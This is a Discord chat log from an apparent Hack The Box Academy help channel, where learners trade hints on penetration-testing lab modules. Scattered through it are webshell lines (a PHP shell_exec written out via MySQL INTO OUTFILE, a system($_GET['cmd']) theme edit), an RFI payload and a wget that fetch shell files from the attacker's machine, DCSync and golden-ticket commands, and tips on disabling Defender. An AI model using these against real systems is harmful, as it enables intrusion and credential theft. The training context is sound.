#modules

I think the order of the modules hasn't been tweaked yet - it's a little odd.

Why is the order odd?
Okay, Network Traffic Analysis could have been placed earlier. But apart from that?

Javascript deobfuscation at the very end? lol

Yes, it doesn't have much in common with the rest of the modules.
I think there's still something about phishing to come. Only then JavaScript really becomes a topic

JavaScript Deobfuscation being there might just be because they put malware analysis so late

Let's see what the path looks like when it's complete.

It would be cool if we could then use these labs to prepare for the exam
https://www.hackthebox.com/blog/htb-sherlocks-dedicated-labs

I'm on the windows file transfer methods module and I don't see any references to the command "python3 -m http.server 8000"

That's what I've used in the past for download operations. Just curious, I expected to see it mentioned.

Forget I said anything, I just looked ahead and it's in the linux transfer methods module

that makes more sense.

I just saw the python3 -m uploadserver command and thought it would be in the same module

basically start a web server and get a your victim into your "http://example.com/your_file.exe"

Hello,
In the module Ad, Section "Attacking Domain Trusts - Child -> Parent Trusts - from Windows"
I get a golden ticket for user hacker using mimikatz. I can see it with klist. However the command : ls \academy-ea-dc01.inlanefreight.local\c$
returns an error. Is it me or something else?

ban speedrun

any recommendation which to do first?

<@&861185840277487616>

this is rule break right?

Serious Rule Break skip for the any% ban speedrun :o

Tells us that we can’t do nothing but dam where his messages at? Haha

127.0.0.1

<@&861185840277487616>

what is happening this night lol

What happened?

other mod deleted it I guess

one guy asking for someone to perfom ddos attack to an ip

Can anyone explain the commands here? I understand the outcome, but I don't want to blindly follow commands without knowing more about how they work.

Hi Everyone! I'm working on Academy module for footprinting. Making my way through the Hard lab at the end. I've managed to capture some keys, and SSH into the system. I don't have root, but I'm wondering if there are any suggestions or things to look for once establishing a foothold. I've check some cache history of bash under the user I have logged into, but nothing stands out. Any suggestion?

Here are two tips: the IMAP/POP3 and SNMP modules were extremely helpful for solving this. EDIT: Since you've already SSH, here is another hint: the MySQL section was helpful.

chatgpt will demonstrate every single command better then anyone

https://explainshell.com

Intro to Assembly Language

Hi
Module: Attacking Common Applications
Section: Attacking GitLab
Question: gain remote code execution on the GitLab instance? Submit the flag in the directory you land in.
Here, I found the user named D..., could sy give me a hint how to find his password? I search through the git repositories but nothing.. maybe I missed sg?

there is no need to attempt to find his password

Have you tried enumerating more once you've SSH'ed into the system? Ask yourself what the user might have done in the system.

Hi! Im with the Password Attacks module in the medium lab and I dont have a good wifi connection. I have retrieved some users but just got false positives with the 123456 password

I am trying to brute force ssh with hydra but nothing with the password list provided and with rockyou or mutated list it take a lot of time

Any hints of what password list use to save time?

can anyone help me with the windows privilege escalation module dnsadmins sections?
I can't get the flag or the reverse shell even after I follow the step by step from the module, is there something missing?

Footprinting - mysql
I cannot install the mysql server and it does not seems to be installed on the pwnbox. Anyone a nudge?

yo guys why cant i send pictures in here?

I guess because you haven't verified your Discord account yet

how do i do that

go to #bot-commands and type /verify then follow the instructions the bot DMs you

Check out #rules and then #welcome

Hello everyone! Recently, I've been having this problem where any target machine becomes very unstable. It's on for a few minutes, then randomly goes off and I can't access it for some time. Then, it just randomly goes on again. This makes it nearly impossible to solve questions. The problem also happens in every module. I tried this with Pwnbox and the same thing happens. Has anyone else been experiencing this problem? Or is it just me?

reach out to support through the website

why i cant find my account Identifier?

im in my user settings right now but i cant find it

Thank you

Follow the instructions here: #welcome message

the token is copied from the right hand side of the page

oh its on the main platform

@fallow delta please how you rdp with user ilfserveradm

I just guessed

Please delete the image.
Answers to questions should not be posted

sorry didnt know

but how did i got it right? i dont understand

if you have looked carefully enough at the last result, there is a variable that can help you identify the operating system based on the value

How you did it, I do not know. How to do it correctly is described in the module

wdym

from one x range to y range, you can guess the operating system

im new to this cyber world, so i dont understand you sorry

like i think im in the secound module

are you talking about the X(ip) > Y(ip)?

Nope, not the IP, its something that has live in its name

im so confused lol

Try to ping yourself (localhost) and look at the values, you know that you use a Linux OS disregarding the distro flavour

Also, disregard the time column that holds the values in ms

please how to rdp to user

ohhhh

you are talking about the ttl right?

🙏

but i dont get how a ttl is related to an os

Each os has their own default ttls

For pings

https://ostechnix.com/identify-operating-system-ttl-ping/

got ya

thx

I am doing Hacking Wordpress module, and I am at the last section, skills assessment, wpscan is telling me that the target does not seem to be runging wordpress.

and I manually checked the target

i does not seem to actually running wordpress

Check the Source Code

what source code

do you meen this : https://www.inlanefreight.com/

From the Website
Pay attention to the a tags

I think .com is wrong

I came accross this articule

yeah filter the paths of that domain

^^

Now I am confused.
You write that you are in the Wordpress module.
But you post a question from another module

oh I did know that this was from another module, my bad

I think i found it, this should be it, http://blog.inlanefreight.local

Yes, it will be announced soon

I imagine red team experience is more valuable as a blue teamer, than blue team experience would be as a red teamer.

If you want to attack something, you must know how a defender thinks and acts.
If you want to defend something, you must know how an attacker thinks and acts.

mod :FILE INCLUSION cont :Remote File Inclusion (RFI) q: Attack the target, gain command execution by exploiting the RFI vulnerability, and then look for the flag under one of the directories in / payload :http://10.129.29.114/index.php?language=ftp://10.10.15.163:21/shell.php&cmd=ls ../../../

do i have to lget the root privs to get the flag ?

cant find the flag on any file in / dir

how do i find an hostname of a target?

hostname

To use FTP you have to run FTP serving a Payload on your machine You doing that?

yes i am i was just lost in the dirs but anyways i got the flag

like sudo nmap hostname (ip)?

how to install kali linux

tell me

https://www.youtube.com/watch?v=M0mBpTPE78k

thank you so much

Hi! Im with the Password Attacks module in the medium lab and I dont have a good wifi connection. I have retrieved some users but just got false positives with the 123456 password
I am trying to brute force ssh with hydra but nothing with the password list provided and with rockyou or mutated list it take a lot of time
Any hints of what password list use to save time?

I arrived 50 modules

guys, im doing the module Post-Exploitation, i dont find right answer for the question nr2, according to me is PCI, but it doesnt work

Can someone help me with that?

Its the network enumeration with nmap

is there any one that has done Linux Privilege Escalation > Logrotate and is willing to help me with sanity check? I want to know what I did wrong with my command

The command is probably spoiler so I'm not sure if I can post it here

yeah im stuck here too, ive somehow created two more log files but no shell has been executed

use -sV -sC and try banner grab, it should be there

What is a banner grab?

https://academy.hackthebox.com/module/19/section/103

I found it is faster to perform password scanning using the web parrot machine provided by htb, especially if you have bad connection

I'm a bit desperate here I am on Password Attacks Lab - Hard already got the .vhd file, but I can't mount it, only one partition appears on the disk partitions and it's not bitlocker I've tried it on the VM I can't do it either can someone help I've tried the guestmount and it always gives an error

I just did it from a Windows dev VM machine I had for tests

Okey, I'll try thanks

hi i stuck in Linux File Transfer Methods question 2

Upload the attached file named upload_nix.zip to the target using the method of your choice. Once uploaded, SSH to the box, extract the file, and run "hasher <extracted file>" from the command line. Submit the generated hash as your answer

already upload with scp, but when ssh and extract .zip value is invalid

Module : Windows event logs & finding evil
Section : Windows event logs.

Question 1 : Analyze the event with ID 4624, that took place on 8/3/2022 at 10:23:25. Conduct a similar investigation as outlined in this section and provide the name of the executable responsible for the modification of the auditing settings as your answer. Answer format: T_W_____.exe

Hi ! I'm currently stuck there too, can you tell me what I'm doing wrong ?

Hi, read the question carefully again: Analyze the event with ID 4624, that took place on 8/3/2022 at 10:23:25. Conduct a similar investigation as outlined in this section and provide the name of the executable responsible for the modification of the auditing settings as your answer. Answer format: TW__.exe

I am doing wordpress hacking, final assigment, I am trying to do RCE, when I update from theme editor it tells me this error. I simply add this line: "system($_GET['cmd']);"

Is this suppose to happen.

Never mind I just update another theme and it worked. I still think that this error is not supposed to happend.

Hi guys. How can I learn how to get a reverse shell from XAMPP? It's for a module

The module should teach you all that you need to know - you may need to revisit the content again

@high zinc it doesn't

it should, otherwise chances are you're not supposed to get a rev shell

XAMPP contains MariaDB, PHP, and Perl, all of which have ways to give you a shell, if they are configured incorrectly on the target machine (or vulnerable versions are running)

dude, I've done many modules and I always have to search things

that happens sometimes yes.. but yeah, depending on what your target has running and how, different methods exist. XAMPP is a suite of tools

sometimes lol

literally always

so far I've been copy/pasting from the sections to my terminal in the CPTS path, and I'm 13% through 😄

just wait

do you know of this one? https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master

Maybe it can help

(worthy of a bookmark regardless)

I am stuck at this last question in wordpress last section and it is driving me nuts, since I even got the reverse shell, Use a vulnerable plugin to download a file containing a flag value via an unauthenticated file download?

I have no clue where this file might be

you have the file, right?

in your computer

?

in some modules when you donwload things

you have to use ls -al

Use a vulnerable plugin to download a file containing a flag value via an unauthenticated file download?

I've typically found flag files in /home/<someuserhere>/flag.txt, /root/flag.txt, /flag.txt ../../../../../../../../../../flag.txt (i.e. at the root of the context that the vulnberable web is at, when exploiting, like /var/www/myLittlePhpPlatform/flag.txt)

Maybe the search engine of your choice will help you to find this plugin.

they seem to be already on the box with a terminal

Yes, but he still has to trigger the download via the plugin.

oh

Access via terminal is of no use to him in this task

i see

is it in the wpscan report?

This makes no sense to be honest

i'm not entirely sure, but i think so

Yes, it does make sense.
Sometimes there are vulnerabilities in software that can be exploited

The formulated question does not specify the file name

Because it doesn't need to.
Find the plugin, exploit the vulnerability and get the flag.

Just go to the forum, usually you find hints there

i told him what to do

are you talking about Local File Inclusion vuln

(if you haven't scanned with a (free) API key by the way, it'll make a huge difference )

No, i talk about a Plugin with unauthenticated file download

There are so many vulnerabilties on the report, and none of them talks about arbitrary file download

Use a search engine

ok I will do that

Use a vulnerable plugin to download a file containing a flag value via an unauthenticated file download?

can someone help me with that error? im tying to convert a xml file into an html file

I just did this, it worked.Thank you!
It was too easy and stupid. Damn I was just overthinking.

Is bruteforcing the first thing you did?

for the pivoting module's skill assessment, has anyone tried pivoting thrice to the DC? or is it simply not possible

https://medium.com/@kartik.sharma522/mounting-bit-locker-encrypted-vhd-files-in-linux-4b3f543251f0 You can try this

No, the first thing that I did was to bruteforce the smb shares and retrieve a password protected zip file. I have tried to crack it but no password was found. I can’t do anything more in the smb shares, so I tried to find any valid credentials for the ssh service but I got stuck here.

Have you tried to crack the zip file with the mutated password list?

why do i want to disable this scans?

I want to say that Windows, by default, doesn’t respond to ping but that could have changed.

Regardless, sometimes you know a box exists but can’t ping it, so that’s what that option is for.

to not waste time?

The other two are built-in with a similar mindset

Basically. Also to make sure you’re picking on machines Nmap would otherwise ignore

👍

You may also end up in situations where ICMP is blocked on the network, so if you don't assume that the host is online, the scan will fail

(yes, blocked... some security folks are too paranoid)

So got a technical question because I might be doing this wrong. Trying to do the Privilege Escalation lesson in the Getting Started module and I've gotten the first flag and from here I'm trying to do further enumeration by pulling linpeas onto the target however both curl and wget are timing out when connecting to my machine. python3 was initially trying to set the ip to 0.0.0.0 so I changed it to my tun0 connection thinking that would allow it to connect but it seems I'm wrong. Anyone have guidance on this?

When a program says it’s listening on 0.0.0.0, that means it’s listening on all interfaces

You might not be specifying the correct IP, port, or path

Omfg… I tried everything this morning, I tried with the mutated list but I think I used the parameter —format=zip and it didn’t work with it. Thank you very much, I have it now

somone got a list maybe to all the scans and what they do??

an explanation about them

nmap --help and particularly man nmap are good places to start 😄

Hi! Im doing the last question og the Windows PrivEc - Pillaging, and i have the SYSTEM, SECURITY AND SAM Files but secretsdump for some reason fails. Can someone help me?

So essentially let Py3 cook and specify my tun0 or eth0 ip in the pull and set the port the same on both?

Yep

Fingers crossed, I've been at this question for awhile now.

Shouldn’t take that long :/

john has some nice tools like zip2john, ssh2john,etc.

If you ran python3 -m http.server 8080 you should be doing wget http://10.10.10.10:8080/shell.sh

Assuming shell.sh is located in the path you started the webserver in

omg these modules are making me crazy

I have more problems getting things to work than learning I am DONE

What exactly are struggling to get working?

JUST EVERYTHING

😭

If you can get more specific we can try to help you

Like the burpsuite section here, its so easy and I have done burpsuit but I cant even follow along because its outdated https://academy.hackthebox.com/module/110/section/1049

im just done

ITS SO EASY BUT THEY MAKE IT SO HARD

Proxy>Options?? its Proxy>Settings. Then go to Intercept Server Responses...NOPE, its Response interception rules. ITS LIKE THIS EVERY MODULE IM DONE GOODBYE

yep

some options they provide don't work

The GUI may be changed, but the features are for sure still the same.. you just have to adapt
It should not be that frustrating to follow along clicking on Options instead of Settings.. it has pretty much the same meaning

thats just one example

I keep running into something every module

Btw, you can report outdated things or bugs on #858470491676737536.. if some of HTB staff feels like it's important enough, it will be solved asap

but like what is this wording

In Burp, we can enable response interception by going to (Proxy>Options) and enabling Intercept Response under Intercept Server Responses.

then the next sentence:

After that, we can enable request interception once more and refresh the page.

what do you mean ONCE MORE???

"In Burp, we can enable response interception by going to (Proxy>Options) and enabling Intercept Response under Intercept Server Responses. After that, we can enable request interception once more and refresh the page." ONCE MORE??

im done bro, I have to take a chill pill

thanks for helping

I think none of the issues you're talking about are making it impossible to understand those concepts.. many modules could be done better but on average it's actually pretty good content for someone trying to learn
Get a brake and try again later on.. that is probably a good way to deal with this situation

why there is so mush lines? i did the exact same commands on the left and i got tons of lines

and it keeps going

If you scroll down a bit more, in that table, you will see what the --packet-trace option means and that will explain everything

so why i dont see so much lines in the htb pic?

That "pic" has a line which is <SNIP> every time you see that, it means something from the command output has been omitted from the output you can see.. usually it's info that is not considered essential

ohh alr

can i get some help here? im stuck😕

i got all the open ports and the services but i have no idea what to do next

Generally speaking, try to provide which module you are on:)

Network Enumeration with Nmap

Service Enumeration

Yo

One of these things is not like the others

No

Wym *

Thats completely unrelated to academy

..

And learning modules

:)

@carmine trench did you try something similar to the examples given in the module?

Nice so this server is called “HackTheBox” for no reason

There is allegedly a offtopic server somewhere

HackTheBox is the name of the website you absolute knob

You have to verify your main app.hackthebox.com account following instructions in #welcome

The other perks of doing so are it allows you to post images

thx, something messed up with my account, gotta contact a mod

That happens

If you look at members list you can see mods/admins and you can message any of them :D

🔔🔚

there are other tools besides nmap (try the other ones noted in module)

Have you done this module?

I'm stuck in the same place.
I see various events with ID 4907 between logins, but they don't seem to have any correlation to the logins.
Nevertheless the EXE file is the correct one

Can you explain the correlation between the two events?

Hey guys I'm on DCSync of Active Directory Enumeration & Attacks. Im supposed to find syncron's cleartext password but I keep getting timed out errors: secretsdump.py -outputfile inlanefreight_hashes -just-dc INLANEFREIGHT/adunn@172.16.5.5

Impacket v0.9.24 - Copyright 2021 SecureAuth Corporation

Password:
[-] RemoteOperations failed: [Errno Connection error (172.16.5.5:445)] timed out
[*] Cleaning up...

Also if I try the mimikatz method to accomplish the same thing:

mimikatz # lsadump::dcsync /domain:INLANEFREIGHT.LOCAL /user:INLANEFREIGHT\administrator
[DC] 'INLANEFREIGHT.LOCAL' will be the domain
[DC] 'ACADEMY-EA-DC01.INLANEFREIGHT.LOCAL' will be the DC server
[DC] 'INLANEFREIGHT\administrator' will be the user account
[rpc] Service : ldap
[rpc] AuthnSvc : GSS_NEGOTIATE (9)
ERROR kuhl_m_lsadump_dcsync ; GetNCChanges: 0x000020f7 (8439)

I am sorry, have you did the previous one?

Yes

could you help me... thanks

@rapid sparrow Password123! should be wley's password

No I didn't do the module, just looked at the first question and found the thing

my reasoning was that something happened after 4907 which would be the next thing

I should open a new powershell with that user?

Can I send you a Printscreen?
I do not want to spoil here

sure

@rapid sparrow no you don't have to, just change Password123 to wley's pw, you can keep the powershell session open

this is the biggest problem...

Creating a Fake SPN

btw I forgot to mention you have to re-enter all the commands

@acoustic owl is it alright if I DM you?

could I also dm you....

@rapid sparrow sure lets DM

sure

i'm doing the module ATTACKING SAM. i'm trying to do the lab but i keep getting an error which i can't figure out why its not working

i run the command sudo python3 /usr/share/doc/python3-impacket/examples/smbserver.py -smb2support CompData /home/bluekali

and when i try to transfer the files over to attack machine it disconnects for some reason

this is the rdp session to move the files over

Where did you save the sam and system files?

i copied the command in module reg.exe save hklm\sam C:\sam.save

Ok, so where does that command save the file to?

to the C drive

And where are you running the move command from?

🙈 thanks @trail leaf

Have you read the text...?

whats about it?

oh fuck

In your screenshot that is

no way

😩

dude i been stuck on this for hours

omfg

Happens

oh wait@rustic sage

i tried to right it as the answer

and it doesnt work

what am i doing wrong?

Is anyone past Tomcat section on Attacking Common Apps?

yes and a bit of imagination to get the flag for me at least

No idea where that flag is located. I got a quite intractive webshell and using find / produces nothing

cause is not a fully interactive shell, you can use tree though or at least that's what I have used in combination with CTRL+F

Why didnt I think of that

1. remove your screenshot as it's revealing an answer
2. you're probably also copying the 220 response code part, the flag is just the HTB{...

thank you

Appreciate the nudge. I started to go crazy

hello i m in the live engagement of Shells & Payloads and i can t manage to connect to 172.16.1.11:8080 is it working for you ?

Are you connected to the provided jump host?

the vpn ?

No

When you spawn target

Are you connected via rdp to that system

That's the first step

Ok i connect via rdp

and from there i connect to others ?

Yes

As the 172.16.x.x are internal

Note: for the webpage one, you can start Firefox by typing firefox in the terminal

thanks you

Did you download the word list from resources tab?

Do that XD

That's is 80% of answers

Also

Creating the mutated password list from those files

Can someone give me advice for NoSQL - Skills assesments 2 ? I guess I found the idea, but I'm stuck with it

hello all

module USING WEB PROXIES

section: ZAP Fuzzer

The directory we found above sets the cookie to the md5 hash of the username, as we can see the md5 cookie in the request for the (guest) user. Visit '/skills/' to get a request with a cookie, then try to use ZAP Fuzzer to fuzz the cookie for different md5 hashed usernames to get the flag. Use the "top-usernames-shortlist.txt" wordlist from Seclists.

i was able to fuzz and get the cookie hash

ok

but how do i use the hash as a cookie to get the flag

Module: window priv esc
Section: weak permission
Description: this section being haunted :))

Anyone able to give a nudge on Citrix Breakout? I started the smbserver on the htb-student box I rdp'd onto. But when trying to access the smb share I get Windows cannot access the share. Not able to transfer the tools needed to priv esc

can someone help me with Snort Rule Development in the Working with IDS/IPS module? I found the respective line in the pcap file and I googled many snort signatures for log4shell, but i have no idea what the question is about.

There is a file named log4shell.pcap in the /home/htb-student/pcaps directory, which contains network traffic related to log4shell exploitation attempts, where the payload is embedded within the user agent. Enter the keyword that should be specified right before the content keyword of the rule with sid 10000098 within the local.rules file so that an alert is triggered as your answer. Answer format: [keyword];

Look to the dot

anyone here who could help me out with 'oopsie'?

uploaded the reverse shell but netcat does not show up anything

Ask in #starting-point, you'll get more help there

Got with MySQL. Just had to backtrack some.

can somone explain to me what does the /24 means?

@carmine trench look up CIDR notation

how do i bypass AV to move a file?

nvm i found the solution

./odat.py file taking its time completing - thanks Footprinting module

So Getting Started-> Priveledge Escalation. Am I going down the wrong path trying to get linpeas onto the target machine to enumerate it? I'm thinking that's the goal but I also feel like I'm going the wrong way at times.

You can use Linpeas or you can try to enumerate manually, up to you

iirc you don't need it to run the full amount of time to complete whatever task they want you to do

I am having trouble

I am not seeing the request in burpSuite HTTP history section when i run the nmap scan

I have tried with Intercept on and off

https://academy.hackthebox.com/module/110/section/1053

maybe its just taking a long time, its going through proxies or whatever I GIVE UP

yeah, it just took awhile I got it. I am gonna lose it before I get through all these modules

i'm cracking an NT hash

and for some reason hashcat isn't spitting out the password, any idea/tips to help

thought hash had to be in a file 🤔

looks like maybe it found it already? try adding --show at the end

that worked thanks

since it was only one hash to crack didn't need to put the hash in a file

guess I learned something today

Attacking Common Services - Easy: I have credentials, I now have been stuck on reverse shell. I've tried netcat, weevely, amongst a few other methods. Nothing working. From the forum, I see some folks uploaded through mysql, but I am uploading thru the browser. Can I get a nudge on which is the path to go? Also, which shell worked for you? Neither has for me.

I believe the intended route is ||upload through SQL||

Ok. I'll re-focus on that path and see what I can come up with. I'm sure I just have typos and incorrect syntax, etc. Trial and error. Thank you!

For me, it was literally as the examples showed... I'd confirm the IP address of the share, and the path you're typing. Failing that, try reverting the box.

Hello,
"Attacking domain trust from windows"

Golden ticket for 'hacker @ LOGISTICS.INLANEFREIGHT.LOCAL' successfully submitted for current session

mimikatz # exit

Then Klist returns effectively the cached ticket but I get "path does not exists" when I check with:

ls \academy-ea-dc01.inlanefreight.local\c$

I need a nudge for this one...

discord removed the double backslash after ls

not a solution to your question, but a solution to your comment about discord removing double backslash... use triple backticks (`) both before and after the content you want to insert and you can then have it NOT remove the double backslash ... ls \\academy-ea-dc01.inlanefreight.local\c$

Thank you.

I am still investigating my issue.
In a session without golden ticket, I expect a

ls : Access is denied```

But I get

ls : Cannot find path '\\academy-ea-dc01.inlanefreight.local\c$' because it does not exist.

So navigating through windows explorer I tried some folders I found there, such as User Share, Department Shares, ZZZ_archive. But I get the same error message like nothing exists.

And with the golden ticket I get the same results.........

how about with IP, instead of hostname?

I tried that too

172.16.5.5

In Linux Privilege Escalation > Logrotate, I tried to use the root permission from the logrotten exploit to write a setuid file a.sh

(Use echo to write this to a.sh)

#!/bin/bash

whoami
cat /etc/sudoers

Then chmod 4777 a.sh (as root)
when I run ls -l a.sh, it show -rwsrwxrwx root root. However, when I try to use the account htb-student to run ./a.sh, the whoami command returns htb-student, and the cat /etc/sudoers command returns permission denied. What did I do incorrectly with setuid?

There is a file in the hashcat file that’s called potluck or something pot. It stores your found hashes. So what happened is you found this hash/password before and it’s in the file. If the hash is in the file it does not try to crack it.

hashcat.potfile

@high reef If you are testing delete the found/know hashes from profile. It will try to crack the hash again. Thanks @balmy saffron

It already cracked it previously

2 weeks ago a guy told me how he locked abunch of cyptro in a wallet. Asked me to help, told him I have a lot of gpus but no idea how to brute force. Spent the last 2 weeks learning how to. I am currently at 7 space password. Should be done tonight. No password yet. So now I shall learn how to do a dictionary attack

That's completely unrelated to academy content

Refer to #welcome

Should I put that comment in a password protected file see if you can hack it?

No

Ok so your comment is pointless

This situation is completely unrelated to academy content

Which is what this channel is about

Which is why I referred you to #welcome , which tells you how to access more of the server

It’s actually 100 percent related hints my comments above helping the person that had a question.

Not really but whatever

Not arguing about it

Probably stop being a Npc your life will be more enjoyable

Oh no I got called an NPC

My life is joever

My main point of my comment was to that person asking for help. I believe I helped with the answer. I did not know the answer 2 week ago. Learning is fun.

So we are 20 more useless comments into this channel. Because you wanted to show your power over someone on discord. You showed me my guy. As Jesus would say love your neighbor

Lol I have no power

I understand that, that’s why u feel the need to role play it

I'm just stating the story didn't seem relevant

¯_(ツ)_/¯

Whatever you gotta say pal

Love your neighbor, if u don’t have something nice to say don’t say it

I mean I haven't been mean

Not everyone is you and not everyone follows your logic

The fact you commented on my last post not the 5 above it where I took time out of my day. To help this person with a issue they were having. Was not nice

Have a lovey rest of your night maybe it will be less toxic

The only one really being toxic is you, calling me an NPC. Being slightly butthurt that I just didn't think your story was relevant. Like, good job you're learning hashcat and cracking files.

Which there is a password attacks module that goes over different types and methods. Mostly over live tcp protocol, some regarding files

Hey, im currently using rpcclient to enumerate domain users and want to either write the output to a file or grep the output. I've tried looking at documentation and looked it up but I haven't found anything quite yet

does anyone have any pointers?

enumdomusers > output.txt didn't do anything when i tried

no stress if not 🙂

I think the rpcclient tool allows you to pass a command through that you might be able to output it as

alright I'll have a look at that cheers

yep and hint if burp is going to fast set the delay to 25 sec

i did have that same issue multiple time and have to reset that buggy Fing target god know how many time until i get one that work for me

also which the powershell set to bypass you can import stuff straight from your smb share Import-Module \\10.13.38.95\share\PowerUp.ps1

no idea what issue you are having but if you still need help feel free to shoot me a dm

I ended up solving the section. Had to do some janky copy and paste magic. But yea good to know I wasn’t the only one facing that issue

yea working with windows 7 or earlier lab is always a pain in the ass

you can use the -c for running command without dropping into a kinda rpcclient shell so you can just pipe the output to something like grep

thanks man thats great, appreciate it

I've solved it. Turns out setuid only works for compiled binary in ubuntu

Hey guys, im doing the Windows Command Line Module and and I wonder why/when we should use the "Invoke-Command" cmdlet and put commands in a script block and not just execute them directly?

If anyone has a moment to lend me a hand with the logrotate section of the Linux Privilege Escalation module I'd really appreciate it.

I just did it this morning if you need any help

Of course, two seconds after I finally reach out for help, I land the flag. Thanks mate. I really appreciate the offer. 🙂

Hello, I'm having trouble on the Pivoting, Tunneling, and Port Forwarding module. I'm stuck at the SocksOverRDP section. Whenever I try to use regsvr32.exe to load the DLL file required for SocksOverRDP to work, it gives me the error "module failed to load, the specified module could not be found". The filepath is definitely right though. Am I doing something wrong?

It's because there's a secondary protection running

Defender is turned off however that does not disable another protection feature that works in real time

I got it, had to exclude the file type in Windows Security. Thank you for the help!

You could also just disable real time protection iirc

Either way

:)

Not sure why this isn't working.

I'm trying some pivot stuff. I watched in a video that this command should drop another ssh menu inside a ssh connection.

It's supposed to work like this.

Can't anyone help on why this isnn't working?

Skill issue? I'd check the guide as that looks more like a key combo than anything else

^C denoting the hard cancel

But also what module is this for 😉

Shhh... This is the best section to ask question and technically..... I'm hard stuck on Pivot module so i'm trying this box to get a better understanding of it. I noticed the cancel to but i think i saw in a another video Ippsec did that as well. Does Ipp have write ups? I thought he only did the videos

https://superuser.com/questions/985437/ssh-escape-key-only-works-when-connection-is-stuck

This is how I got mine ||http://10.129.203.7/shell.php?cmd=type C:\Users\Administrator\Desktop\flag.txt|| how did you get yours? I also did the following as the second way to get the flag as well as privesc/takeout ||uploaded a meterpreter shell via ftp and then triggered via the webshell|| I

Hi mate is it possible to get a help on this..?

Hi @gaunt surge I also have issue finishing that lab , me, I'm at the poit where i should do the reverse or bind shell but neither works for me.Any suggentions or hints please?

Dmd

I have this base64 encoded ticket, how am i supposed to get the ticket into aes? If I decrypt it with base 64 i get some weird stuff

In my notes i see that i used a|| sql webshell to get a webshell, in there i used revshells.com to generate a reverse (power)shell and get the flag||
something like this, but different path i think;
||mysql> SELECT "<?php echo shell_exec($_GET['c']);?>" INTO OUTFILE '/var/www/html/webshell.php'||

Look at the ||look at the 2nd example under Exploitation section of the chapter. But you may also need to put it in something else to Bypass a Filter....||

hello anyone able to confirm what answer will be accepted here in Documentation & Reporting
i can do it in tmux with tmux but answer isnt accepting, trying caps/ spaces..?

I guess ill just die lol, ive tried everything, but I cant do it only using rubeus

what module/section your at please

Tried these solutions but no luck

I am wondering how i can use the base64encodedticket thing as a ticket

If I try to use the base64encodedticket it gives me an error

and I just want the ticket

as aes256

but I cant

what module

https://academy.hackthebox.com/module/147/section/1639

I dont get why that is important but ok

bcuz iv seeen the issue before and have notes on it somewhere

ah oke

how come not doing it using rubeus

The thing is

Lol

Short answer, no, because that would be sharing answers. The answer to what you should be asking: It's literally on the same page, try searching for the name of the answer to the 1st question + session. i.e. "<toolname> session".

If you follow the example step by step, you should find it.

Ah I figured it out, i didnt see one very important command xd

nice one

thing is im staring at the answer... i can split terminals vertically with the commands yet my input answer combinations isnt accepting

is it Ctrl, Control, control ctrl ctl?

got it... what a giant POS ...

funny how iv refreshed the page its its dropped one of the [KEYS] off my answer now ...
the questions says "(Answer format: [key] + [key] + [key], " but the accepted answer format has 4x [KEY] spaces

answer format is misleading

You need to put them in the format they provide. I.e. inside square brackets. [CTRL] + [key] + [key] + [key]

yes ty,, thats not what the questions suggests tho. bit misleading

it literally says that in the question

are we looking at the same ? mine shows 3x KEY spaces

not Ctrl + 3

Mine is 4

They probably made it accept both for those people with Macs

Thank you! Appreciate it

same question , only the top answer accepted for me but when refreshed changed to the bottom?.
answer format showing 3x KEY spaces

Please help! I can't get the shell doing everything "right".
Module = Shells & Payloads | Automating Payloads & Delivery with Metasploit
Error = Exploit completed, but no session was created

maybe isn't right what you're doing, but it looks ok to me

Cant see anything obviously wrong, but one of things I've always done is set the LHOST to the name of the VPN tunnel interface (in pwnbox its tun0), rather than the IP address. Saves on typing, and you dont have to remember the IP.

And of course you dont get frustrated if the IP address changes after the VPN drops 😄

thats an awesome tip, i'll use it moving fordward

it worked from the pwnbox, idk why

thank u for your help@pine dagger @fiery berry

After so many hours of reading about xampp I finally got the flag

the guys on the forum were right, you have to understand how things work in order to hack them

and read the documentation

$ sudo zip2john backup.zip > hashes
zsh: permission denied: hashes
on module vaccine, any help

Better ask in #starting-point
If you have no access, read and follow #welcome

Well... that's not quite true, but certainly does help to understand wtf you are doing when things go wrong. 😄

Can anyone help me with logrotate module in linux privilege escalation. I don't know where to start and what to do.

Reading from the module is probably a good start.
Then try to practice what is shown there.

Hi! I’m a bit lost in the Password Attacks Lab - hard, I have the vhd file but I don’t know what to do with it. Any help?

I have tried to mount the image in win 7, 11, kali and manjaro and nothing. I use 7z to decompress it but I cant do anything with the img files

vhd files are virtual hard disks.
You can mount them.

You are in the Password Attacks module. So this file will be protected 😉

Yeah, with bitlocker isn’t it? I was following this link https://medium.com/@kartik.sharma522/mounting-bit-locker-encrypted-vhd-files-in-linux-4b3f543251f0 but it gave me error

Yes exactly, bitlocker
Have you cracked the password?

No, I don’t know what to use

Can I pm?

sure

guys, is /usr/share/dirb/wordlists/small.txt good for ftp brute forcing?

How would you use it for ftp brute forcing? It’s a list of directory names, not users

I don't know which to use

Guys how do I check which host are up in a network using nmap? like what is the command

Try a username or password list. Or better yet, tell people which module/chapter/question you need help with.

Rockyou is always good for passwords

the list they provide doesn't work

If they provided it for a module then it should work

if things were that simple

Which module, which section?

@acoustic owl I didn't need a wordlist, like you said in the forum, for some reason the unusual port wasn't open

Can someone help me with that?

--open

like sudo nmap --open

https://nmap.org/book/host-discovery.html

hello everyone, can i DM anyone about Kerberos Attacks - Skill Assessment on the first question?

hello! i'm having trouble on the NFS part of Footprinting. When I try to mount the share it gives me the error "operation not permitted" even though I'm running the command as sudo.
here's the command I'm using: sudo mount -t nfs 10.129.53.125:/var/nfs ./nfs/ -o nolock
am i doing something wrong?

hey friends, hope you a good day, i am at Login Brute Forcing website skill assessment, i am stuck at the 2nd question , i tried rockyou and couldnt have a hit before the machine time is out, tried with rockyou-50 but didnt hit, i am sure that my post form code is correct, i just dont know where the problem

sorry, I haven't see that is for the web skill assessment. I'm going to check my notes

@rich perch try using sudo mount -t nfs 10.129.53.125:/ ./target-NFS/ -o nolock

use the same username found at the beginning of the first question. There rest of the command seems to be fine

OMG bro !! you dont know how much time i wasted on this, thank you so much 😊

I tried on Pwnbox running the same command and it worked. Something funky with my VM... thank you for the help anyways!

If you need help in Footprinting just tell me. I can give you hints to save your mental

sure

Hey, need help with Footprinting Lab - Easy.

Found two ftp servers @ port 21 and 2121. Connecting to them works fine, but not possible to find any files with ls. I tried the ||wget -m --no-passive ftp://uname:pw@ip:port|| but no results. Have tried reseting target box. Any pointers?

solved* for future references, check firewall settings:)

On your client, not the server

ls -al

connection refused due to firewall settings was the issue

